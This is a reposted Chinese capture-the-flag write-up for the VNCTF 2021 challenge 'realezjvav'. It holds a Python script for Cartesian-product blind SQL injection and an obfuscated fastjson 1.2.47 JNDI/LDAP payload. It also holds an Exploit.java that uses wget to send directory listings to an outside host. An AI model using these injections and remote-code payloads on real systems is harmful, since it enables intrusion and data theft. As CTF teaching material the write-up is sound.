[VNCTF 2021]realezjvav

[VNCTF 2021]realezjvav
2021-03-16 10:59:23 Author: mp.weixin.qq.com(查看原文) 阅读量:114 收藏

文章来源：EDI安全

java题开局个登陆框 sql注入？

测得在password位置有注入一个单引号500。

两个单引号正常

fuzz一下发现过滤的并不多但是延时函数过滤了并且貌似不能布尔盲注搜了下可以笛卡尔积盲注。

脚本：

import requestsurl="http://c56083ac-9da0-437e-9b51-5db047b150aa.jvav.vnctf2021.node4.buuoj.cn:82/user/login"flag=''for i in range(1,50):    f1=flag    top=127    low=33    while low<=top:        mid=(top+low)//2        # p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)        # p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='user'),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)        p1="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))={},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)        p2="admin'/**/and/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/user),{},1))>{},1,0)/**/and/**/(SELECT/**/count(*)/**/FROM/**/information_schema.tables/**/A,/**/information_schema.tables/**/B,information_schema.tables/**/C)#".format(i,mid)        data1={'username':'admin','password':p1}        data2={'username':'admin','password':p2}        try:            print(i,mid)            r1=requests.post(url,data=data1,timeout=1)        except requests.exceptions.ReadTimeout as e:            flag+=chr(mid)            print(flag)            break        except Exception as e:            pass        else:            try:                r2=requests.post(url,data=data2,timeout=1)            except requests.exceptions.ReadTimeout as e:                low=mid+1            except Exception as e:                pass            else:                top=mid-1    if flag==f1:        break# user# id,username,password# no_0ne_kn0w_th1s

注：超时时间要自己测下有时候比较大有时候比较小可能跑的人太多了吧

登陆之后发现

测了下可以目录穿越任意文件读取读pom.xml

刚好是有漏洞的版本并且创建角色的时候刚好是json字符串

参考：https://github.com/CaijiOrz/fastjson-1.2.47-RCE

打一下payload 发现被拦了

前两天刚好在p神的星球看到

刚好可以绕过修改后的payload:

roleJson={"name":{"\x40\x74\x79\x70\x65":"java.lang.Class","val":"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c"},"x":{"\x40\x74\x79\x70\x65":"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c","dataSourceName":"ldap://1.1.1.1:1389/Exploit","\x61\x75\x74\x6f\x43\x6f\x6d\x6d\x69\x74":true}}

貌似没bash 用dnslog带出来的flag 具体流程参见那篇文章就行了 Exploit.java：

public class Exploit{    public Exploit(){        try{            Runtime.getRuntime().exec(new String[]{"/bin/sh","-c","wget http://1.1.1.1:900/?a=$(ls /|base64 -w0"});        }catch(Exception e){            e.printStackTrace();        }    }    public static void main(String[] argv){        Exploit e = new Exploit();    }}

微信公众号文章素材之分割线大全

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650506205&idx=3&sn=76e3b6604512bb0333f4ea69724d141c&chksm=83bae639b4cd6f2f2eb2e9014f9a2fb225886a3c3cd7be6899b9f5f4e9ad965c54e17bc29bc5#rd
如有侵权请联系:admin#unsafe.sh